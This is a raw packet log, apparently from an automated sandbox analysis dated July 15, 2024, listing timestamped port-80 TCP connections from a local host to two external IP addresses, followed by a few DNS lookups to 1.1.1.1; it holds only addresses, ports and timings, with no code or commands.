                                      Jul 15, 2024 06:13:44.808125973 CEST804977246.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:44.808218956 CEST4977280192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:44.810122967 CEST4977280192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:44.815551996 CEST804977246.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:45.052531004 CEST4977380192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:13:45.057590008 CEST8049773186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:13:45.057678938 CEST4977380192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:13:45.057849884 CEST4977380192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:13:45.057887077 CEST4977380192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:13:45.062978983 CEST8049773186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:13:45.062988043 CEST8049773186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:13:45.519481897 CEST804977246.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:45.519733906 CEST4977280192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:45.524890900 CEST804977246.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:45.524951935 CEST4977280192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:45.627074003 CEST4977480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:45.632052898 CEST804977446.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:45.632148027 CEST4977480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:45.638272047 CEST4977480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:45.643146038 CEST804977446.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:46.125993013 CEST8049773186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:13:46.126017094 CEST8049773186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:13:46.126087904 CEST4977380192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:13:46.126190901 CEST4977380192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:13:46.131102085 CEST8049773186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:13:46.338176012 CEST804977446.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:46.338347912 CEST4977480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:46.344141960 CEST804977446.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:46.344211102 CEST4977480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:46.455287933 CEST4977580192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:46.460244894 CEST804977546.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:46.460319996 CEST4977580192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:46.460412979 CEST4977580192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:46.465183973 CEST804977546.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:47.157293081 CEST804977546.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:47.158051014 CEST4977580192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:47.163386106 CEST804977546.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:47.163458109 CEST4977580192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:47.295315027 CEST4977680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:47.300271034 CEST804977646.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:47.300348043 CEST4977680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:47.300512075 CEST4977680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:47.305294991 CEST804977646.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:48.021713018 CEST804977646.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:48.022772074 CEST4977680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:48.029486895 CEST804977646.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:48.029649019 CEST4977680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:48.127173901 CEST4977780192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:48.133204937 CEST804977746.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:48.133379936 CEST4977780192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:48.134089947 CEST4977780192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:48.140876055 CEST804977746.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:48.822381973 CEST804977746.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:48.822530985 CEST4977780192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:48.827903032 CEST804977746.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:48.827970028 CEST4977780192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:48.939623117 CEST4977880192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:48.944685936 CEST804977846.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:48.944785118 CEST4977880192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:48.950762033 CEST4977880192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:48.955857992 CEST804977846.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:49.629947901 CEST804977846.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:49.630918980 CEST4977880192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:49.637058973 CEST804977846.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:49.637226105 CEST4977880192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:49.737199068 CEST4977980192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:49.742204905 CEST804977946.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:49.742315054 CEST4977980192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:49.748111963 CEST4977980192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:49.752954960 CEST804977946.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:50.453068972 CEST804977946.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:50.453337908 CEST4977980192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:50.458575010 CEST804977946.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:50.458651066 CEST4977980192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:50.478724003 CEST4978080192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:13:50.484106064 CEST8049780186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:13:50.484191895 CEST4978080192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:13:50.484285116 CEST4978080192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:13:50.484298944 CEST4978080192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:13:50.489046097 CEST8049780186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:13:50.489183903 CEST8049780186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:13:50.564618111 CEST4978180192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:50.569592953 CEST804978146.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:50.569679976 CEST4978180192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:50.569794893 CEST4978180192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:50.574604988 CEST804978146.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:51.288285017 CEST804978146.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:51.288491964 CEST4978180192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:51.293756962 CEST804978146.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:51.293838024 CEST4978180192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:51.408446074 CEST4978280192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:51.413650036 CEST804978246.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:51.413722992 CEST4978280192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:51.414341927 CEST4978280192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:51.419142962 CEST804978246.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:51.529536009 CEST8049780186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:13:51.529548883 CEST8049780186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:13:51.529697895 CEST4978080192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:13:51.529772043 CEST4978080192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:13:51.534655094 CEST8049780186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:13:52.118026018 CEST804978246.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:52.118161917 CEST4978280192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:52.123328924 CEST804978246.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:52.123383045 CEST4978280192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:52.237425089 CEST4978380192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:52.242489100 CEST804978346.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:52.242655039 CEST4978380192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:52.242655039 CEST4978380192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:52.247629881 CEST804978346.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:52.949642897 CEST804978346.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:52.949882984 CEST4978380192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:52.955271006 CEST804978346.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:52.955324888 CEST4978380192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:53.064590931 CEST4978480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:53.069540024 CEST804978446.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:53.069627047 CEST4978480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:53.070255041 CEST4978480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:53.075103045 CEST804978446.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:53.762818098 CEST804978446.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:53.762989044 CEST4978480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:53.768352032 CEST804978446.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:53.768431902 CEST4978480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:53.877072096 CEST4978580192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:53.883865118 CEST804978546.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:53.884051085 CEST4978580192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:53.884634972 CEST4978580192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:53.891244888 CEST804978546.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:54.628289938 CEST804978546.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:54.628494024 CEST4978580192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:54.633692980 CEST804978546.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:54.633776903 CEST4978580192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:54.737950087 CEST4978680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:54.742893934 CEST804978646.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:54.742976904 CEST4978680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:54.743530035 CEST4978680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:54.748321056 CEST804978646.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:55.453135967 CEST804978646.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:55.453392029 CEST4978680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:55.461463928 CEST804978646.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:55.461540937 CEST4978680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:55.564817905 CEST4978780192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:55.570132017 CEST804978746.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:55.570385933 CEST4978780192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:55.575823069 CEST4978780192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:55.580765963 CEST804978746.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:55.980242968 CEST4978880192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:13:55.985294104 CEST8049788186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:13:55.985775948 CEST4978880192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:13:55.985775948 CEST4978880192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:13:55.985775948 CEST4978880192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:13:55.990678072 CEST8049788186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:13:55.990701914 CEST8049788186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:13:56.286751986 CEST804978746.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:56.286911011 CEST4978780192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:56.292069912 CEST804978746.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:56.292155981 CEST4978780192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:56.393872976 CEST4978980192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:56.398889065 CEST804978946.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:56.398967981 CEST4978980192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:56.399029016 CEST4978980192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:56.403822899 CEST804978946.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:57.048315048 CEST8049788186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:13:57.048352957 CEST8049788186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:13:57.048408031 CEST4978880192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:13:57.048527002 CEST4978880192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:13:57.053276062 CEST8049788186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:13:57.085050106 CEST804978946.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:57.085206032 CEST4978980192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:57.090342045 CEST804978946.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:57.090409040 CEST4978980192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:57.205835104 CEST4979080192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:57.210819960 CEST804979046.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:57.210906029 CEST4979080192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:57.216432095 CEST4979080192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:57.221280098 CEST804979046.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:57.902569056 CEST804979046.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:57.902720928 CEST4979080192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:57.908020973 CEST804979046.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:57.908499956 CEST4979080192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:58.019197941 CEST4979180192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:58.024127960 CEST804979146.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:58.024192095 CEST4979180192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:58.024775982 CEST4979180192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:58.029517889 CEST804979146.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:58.721822977 CEST804979146.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:58.729198933 CEST4979180192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:58.734488964 CEST804979146.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:58.734555006 CEST4979180192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:58.895984888 CEST4979280192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:58.901004076 CEST804979246.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:58.901092052 CEST4979280192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:58.907531977 CEST4979280192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:58.912380934 CEST804979246.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:59.755383968 CEST804979246.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:59.755552053 CEST4979280192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:59.760615110 CEST804979246.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:59.760674953 CEST4979280192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:59.862231970 CEST4979380192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:59.867183924 CEST804979346.246.96.149192.168.2.5
                                      Jul 15, 2024 06:13:59.867261887 CEST4979380192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:59.867857933 CEST4979380192.168.2.546.246.96.149
                                      Jul 15, 2024 06:13:59.872724056 CEST804979346.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:00.590145111 CEST804979346.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:00.590279102 CEST4979380192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:00.595572948 CEST804979346.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:00.595618963 CEST4979380192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:00.706146955 CEST4979480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:00.820180893 CEST804979446.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:00.820278883 CEST4979480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:00.821029902 CEST4979480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:00.825855017 CEST804979446.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:01.195749044 CEST4979580192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:14:01.200886965 CEST8049795186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:14:01.200958014 CEST4979580192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:14:01.201127052 CEST4979580192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:14:01.201169014 CEST4979580192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:14:01.205898046 CEST8049795186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:14:01.205988884 CEST8049795186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:14:01.514548063 CEST804979446.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:01.518244028 CEST4979480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:01.523714066 CEST804979446.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:01.523785114 CEST4979480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:01.656661987 CEST4979680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:01.661509991 CEST804979646.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:01.661577940 CEST4979680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:01.661642075 CEST4979680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:01.666415930 CEST804979646.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:02.263787031 CEST8049795186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:14:02.263916969 CEST8049795186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:14:02.264070988 CEST4979580192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:14:02.264070988 CEST4979580192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:14:02.268927097 CEST8049795186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:14:02.348503113 CEST804979646.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:02.348696947 CEST4979680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:02.354959011 CEST804979646.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:02.355034113 CEST4979680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:02.455313921 CEST4979780192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:02.460268021 CEST804979746.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:02.460354090 CEST4979780192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:02.461045980 CEST4979780192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:02.465809107 CEST804979746.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:03.174436092 CEST804979746.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:03.174601078 CEST4979780192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:03.179996014 CEST804979746.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:03.180061102 CEST4979780192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:03.303755045 CEST4979880192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:03.308614969 CEST804979846.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:03.308710098 CEST4979880192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:03.312067032 CEST4979880192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:03.316829920 CEST804979846.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:03.995114088 CEST804979846.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:03.995285034 CEST4979880192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:04.000571012 CEST804979846.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:04.000638962 CEST4979880192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:04.111552954 CEST4979980192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:04.116475105 CEST804979946.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:04.116569996 CEST4979980192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:04.116628885 CEST4979980192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:04.121413946 CEST804979946.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:05.041591883 CEST804979946.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:05.041744947 CEST4979980192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:05.047033072 CEST804979946.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:05.047091007 CEST4979980192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:05.159796953 CEST4980080192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:05.164782047 CEST804980046.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:05.164859056 CEST4980080192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:05.164952040 CEST4980080192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:05.169694901 CEST804980046.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:05.895535946 CEST804980046.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:05.895664930 CEST4980080192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:05.900789976 CEST804980046.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:05.900840044 CEST4980080192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:06.002024889 CEST4980180192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:06.007339954 CEST804980146.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:06.007426977 CEST4980180192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:06.007524014 CEST4980180192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:06.012267113 CEST804980146.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:06.567527056 CEST4980280192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:14:06.572796106 CEST8049802186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:14:06.572856903 CEST4980280192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:14:06.573015928 CEST4980280192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:14:06.573030949 CEST4980280192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:14:06.578133106 CEST8049802186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:14:06.578726053 CEST8049802186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:14:06.788981915 CEST804980146.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:06.789582014 CEST4980180192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:06.794732094 CEST804980146.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:06.794791937 CEST4980180192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:06.908243895 CEST4980380192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:06.913783073 CEST804980346.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:06.913866997 CEST4980380192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:06.914453030 CEST4980380192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:06.919341087 CEST804980346.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:07.621824026 CEST804980346.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:07.621954918 CEST4980380192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:07.627330065 CEST804980346.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:07.627389908 CEST4980380192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:07.635571957 CEST8049802186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:14:07.635652065 CEST8049802186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:14:07.635700941 CEST4980280192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:14:07.635755062 CEST4980280192.168.2.5186.101.193.110
                                      Jul 15, 2024 06:14:07.640500069 CEST8049802186.101.193.110192.168.2.5
                                      Jul 15, 2024 06:14:07.802759886 CEST4980480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:07.807832003 CEST804980446.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:07.807907104 CEST4980480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:08.149764061 CEST4980480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:08.154598951 CEST804980446.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:08.525175095 CEST804980446.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:08.527050018 CEST4980480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:08.532200098 CEST804980446.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:08.534970999 CEST4980480192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:08.660918951 CEST4980580192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:08.665833950 CEST804980546.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:08.665935993 CEST4980580192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:08.665982008 CEST4980580192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:08.670732021 CEST804980546.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:09.352406025 CEST804980546.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:09.352663994 CEST4980580192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:09.357922077 CEST804980546.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:09.357990026 CEST4980580192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:09.470145941 CEST4980680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:09.474976063 CEST804980646.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:09.475162029 CEST4980680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:09.475162029 CEST4980680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:09.479944944 CEST804980646.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:10.161021948 CEST804980646.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:10.161210060 CEST4980680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:10.166275978 CEST804980646.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:10.166363001 CEST4980680192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:10.269848108 CEST4980780192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:10.274840117 CEST804980746.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:10.274904966 CEST4980780192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:10.275562048 CEST4980780192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:10.280317068 CEST804980746.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:10.966250896 CEST804980746.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:10.966381073 CEST4980780192.168.2.546.246.96.149
                                      Jul 15, 2024 06:14:10.971628904 CEST804980746.246.96.149192.168.2.5
                                      Jul 15, 2024 06:14:10.971684933 CEST4980780192.168.2.546.246.96.149
                                      TimestampSource PortDest PortSource IPDest IP
                                      Jul 15, 2024 06:10:28.758306026 CEST5351653192.168.2.51.1.1.1
                                      Jul 15, 2024 06:10:29.770390987 CEST5351653192.168.2.51.1.1.1
                                      Jul 15, 2024 06:10:29.866760015 CEST53535161.1.1.1192.168.2.5
                                      Jul 15, 2024 06:10:29.866871119 CEST53535161.1.1.1192.168.2.5
                                      Jul 15, 2024 06:10:31.893166065 CEST5336053192.168.2.51.1.1.1
                                      Jul 15, 2024 06:10:32.904093981 CEST5336053192.168.2.51.1.1.1
                                      Jul 15, 2024 06:10:33.919715881 CEST5336053192.168.2.51.1.1.1
                                      Jul 15, 2024 06:10:34.247685909 CEST53533601.1.1.1192.168.2.5
